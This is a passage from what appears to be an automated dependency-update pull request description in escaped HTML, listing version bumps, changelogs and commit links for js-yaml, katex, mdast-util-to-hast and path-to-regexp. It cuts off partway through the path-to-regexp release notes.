updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `katex` from 0.16.18 to 0.16.44\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/KaTeX/KaTeX/releases\"\u003ekatex's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.16.44\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.43...v0.16.44\"\u003e0.16.44\u003c/a\u003e (2026-03-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eremove extra \\jot space at bottom of align/gather/etc. (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4184\"\u003e#4184\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/3870ee913e27fdde7bce244e4c6c5d63e2b28a62\"\u003e3870ee9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.43\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.42...v0.16.43\"\u003e0.16.43\u003c/a\u003e (2026-03-26)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse makeEm() consistently to truncate long CSS decimals (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4181\"\u003e#4181\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/0967dcc0278f20d4501a93f01c7343c70abb3fcd\"\u003e0967dcc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.42\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.41...v0.16.42\"\u003e0.16.42\u003c/a\u003e (2026-03-24)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\\underbracket and \\overbracket (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4147\"\u003e#4147\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/5be9abb0b4d687a2a196b8adf9b5b9deeb60f7bc\"\u003e5be9abb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.41\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.40...v0.16.41\"\u003e0.16.41\u003c/a\u003e (2026-03-24)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\\sout in text mode (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4173\"\u003e#4173\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/e748578b63e07ad30d5e404e60b04e5e794c0a5a\"\u003ee748578\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.40\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.39...v0.16.40\"\u003e0.16.40\u003c/a\u003e (2026-03-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecss:\u003c/strong\u003e specify position: relative for .katex (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4170\"\u003e#4170\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/020f0d89567d59229bac5fc8d8f5832a9508a85f\"\u003e020f0d8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.39\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.38...v0.16.39\"\u003e0.16.39\u003c/a\u003e (2026-03-19)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emiddle dot in text mode (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4169\"\u003e#4169\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/edb45b0b17c7b33349ce5142fe39156da05cb4d8\"\u003eedb45b0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/3641\"\u003e#3641\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.38\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.37...v0.16.38\"\u003e0.16.38\u003c/a\u003e (2026-03-08)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/KaTeX/KaTeX/blob/main/CHANGELOG.md\"\u003ekatex's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.43...v0.16.44\"\u003e0.16.44\u003c/a\u003e (2026-03-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eremove extra \\jot space at bottom of align/gather/etc. (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4184\"\u003e#4184\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/3870ee913e27fdde7bce244e4c6c5d63e2b28a62\"\u003e3870ee9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.42...v0.16.43\"\u003e0.16.43\u003c/a\u003e (2026-03-26)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse makeEm() consistently to truncate long CSS decimals (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4181\"\u003e#4181\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/0967dcc0278f20d4501a93f01c7343c70abb3fcd\"\u003e0967dcc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.41...v0.16.42\"\u003e0.16.42\u003c/a\u003e (2026-03-24)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\\underbracket and \\overbracket (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4147\"\u003e#4147\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/5be9abb0b4d687a2a196b8adf9b5b9deeb60f7bc\"\u003e5be9abb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.40...v0.16.41\"\u003e0.16.41\u003c/a\u003e (2026-03-24)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\\sout in text mode (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4173\"\u003e#4173\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/e748578b63e07ad30d5e404e60b04e5e794c0a5a\"\u003ee748578\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.39...v0.16.40\"\u003e0.16.40\u003c/a\u003e (2026-03-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecss:\u003c/strong\u003e specify position: relative for .katex (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4170\"\u003e#4170\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/020f0d89567d59229bac5fc8d8f5832a9508a85f\"\u003e020f0d8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.38...v0.16.39\"\u003e0.16.39\u003c/a\u003e (2026-03-19)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emiddle dot in text mode (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4169\"\u003e#4169\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/edb45b0b17c7b33349ce5142fe39156da05cb4d8\"\u003eedb45b0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/3641\"\u003e#3641\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.37...v0.16.38\"\u003e0.16.38\u003c/a\u003e (2026-03-08)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eaccent skew mixed with font specifiers (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4159\"\u003e#4159\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/aea33758d6c98896017007d0244885301773856a\"\u003eaea3375\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4121\"\u003e#4121\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.36...v0.16.37\"\u003e0.16.37\u003c/a\u003e (2026-03-06)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/0b7006e9af571d8256932bcdc739beb521a4769c\"\u003e\u003ccode\u003e0b7006e\u003c/code\u003e\u003c/a\u003e chore(release): 0.16.44 [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/3870ee913e27fdde7bce244e4c6c5d63e2b28a62\"\u003e\u003ccode\u003e3870ee9\u003c/code\u003e\u003c/a\u003e fix: remove extra \\jot space at bottom of align/gather/etc. (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4184\"\u003e#4184\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/e74702f48bba57006b84dc7412c10fdd991fa55f\"\u003e\u003ccode\u003ee74702f\u003c/code\u003e\u003c/a\u003e chore(release): 0.16.43 [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/0967dcc0278f20d4501a93f01c7343c70abb3fcd\"\u003e\u003ccode\u003e0967dcc\u003c/code\u003e\u003c/a\u003e fix: use makeEm() consistently to truncate long CSS decimals (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4181\"\u003e#4181\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/75d137bc030a11a50c2a078f5b538cb7c1c4cf25\"\u003e\u003ccode\u003e75d137b\u003c/code\u003e\u003c/a\u003e chore(release): 0.16.42 [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/5be9abb0b4d687a2a196b8adf9b5b9deeb60f7bc\"\u003e\u003ccode\u003e5be9abb\u003c/code\u003e\u003c/a\u003e feat: \\underbracket and \\overbracket (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4147\"\u003e#4147\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/4aa75c50c393195fc422ce351dda3368c45623af\"\u003e\u003ccode\u003e4aa75c5\u003c/code\u003e\u003c/a\u003e chore(release): 0.16.41 [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/e748578b63e07ad30d5e404e60b04e5e794c0a5a\"\u003e\u003ccode\u003ee748578\u003c/code\u003e\u003c/a\u003e fix: \\sout in text mode (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4173\"\u003e#4173\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/f3977a0fe9e886dec4f61998be3508acbb04e2b0\"\u003e\u003ccode\u003ef3977a0\u003c/code\u003e\u003c/a\u003e chore(deps): bump actions/checkout from 4 to 6 (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4177\"\u003e#4177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/59115b4cbb974d2a0114b1cd7aac509dd4099c04\"\u003e\u003ccode\u003e59115b4\u003c/code\u003e\u003c/a\u003e chore(deps): bump github/codeql-action from 3 to 4 (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4178\"\u003e#4178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.18...v0.16.44\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `mdast-util-to-hast` from 13.2.0 to 13.2.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/releases\"\u003emdast-util-to-hast's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e13.2.1\u003c/h2\u003e\n\u003ch4\u003eFix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eab3a795 Fix support for spaces in class names\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eTypes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eefb5312 Refactor to use \u003ccode\u003e@import\u003c/code\u003es\u003c/li\u003e\n\u003cli\u003ea5bc210 Add declaration maps\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/compare/13.2.0...13.2.1\"\u003ehttps://github.com/syntax-tree/mdast-util-to-hast/compare/13.2.0...13.2.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/174795b21f7757fffb54dd8d5fb4012f4751f791\"\u003e\u003ccode\u003e174795b\u003c/code\u003e\u003c/a\u003e 13.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/3d05b3a715133df55689fe3753c2e47101315b4e\"\u003e\u003ccode\u003e3d05b3a\u003c/code\u003e\u003c/a\u003e Update Node in Actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/ab3a79570a1afbfa7efef5d4a0cd9b5caafbc5d7\"\u003e\u003ccode\u003eab3a795\u003c/code\u003e\u003c/a\u003e Fix support for spaces in class names\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/efb531231020055e0dab7b39a18d80b569d5b566\"\u003e\u003ccode\u003eefb5312\u003c/code\u003e\u003c/a\u003e Refactor to use \u003ccode\u003e@import\u003c/code\u003es\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/a5bc210f1aa308e4c6141ac374893c9237fcd746\"\u003e\u003ccode\u003ea5bc210\u003c/code\u003e\u003c/a\u003e Add declaration maps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/b54955d4e123b0167eac13646333c809bb8f301c\"\u003e\u003ccode\u003eb54955d\u003c/code\u003e\u003c/a\u003e Add \u003ccode\u003e.tsbuildinfo\u003c/code\u003e to \u003ccode\u003e.gitignore\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/compare/13.2.0...13.2.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 0.1.12 to 0.1.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.4.1\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRemove trie deduplication (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/431\"\u003e#431\u003c/a\u003e)  6bc8e84\n\u003cul\u003e\n\u003cli\u003eUsing a trie required non-greedy matching, which regressed wildcards in non-ending mode by matching them up until the first match. For example:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e/*foo\u003c/code\u003e with \u003ccode\u003e/a/b\u003c/code\u003e = \u003ccode\u003e/a\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e/*foo.html\u003c/code\u003ewith \u003ccode\u003e/a/b.html/c.html\u003c/code\u003e = \u003ccode\u003e/a/b.html\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eAllow backtrack handling to match itself (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/427\"\u003e#427\u003c/a\u003e)  5bcd30b\n\u003cul\u003e\n\u003cli\u003eWhen backtracking was introduced, it rejected matching things like \u003ccode\u003e/:\u0026quot;a\u0026quot;_:\u0026quot;b\u0026quot; against \u003c/code\u003e/foo__\u003ccode\u003e. This makes intuitive sense because the second parameter is not going to backtrack on \u003c/code\u003e\u003cem\u003e\u003ccode\u003eanymore, but it's somewhat unexpected since there's no reason it shouldn't match the second\u003c/code\u003e\u003c/em\u003e`.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v8.4.0...v8.4.1\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v8.4.0...v8.4.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e8.4.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eImportant\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-4926\"\u003eCVE-2026-4926\u003c/a\u003e (\u003ca href=\"https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-j3q9-mxjg-w52f\"\u003eGHSA-j3q9-mxjg-w52f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-4923\"\u003eCVE-2026-4923\u003c/a\u003e (\u003ca href=\"https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-27v5-c462-wpq7\"\u003eGHSA-27v5-c462-wpq7\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRestricts wildcard backtracking when using more than 1 in a path (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/421\"\u003epillarjs/path-to-regexp#421\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDedupes regex prefixes (\u003ca 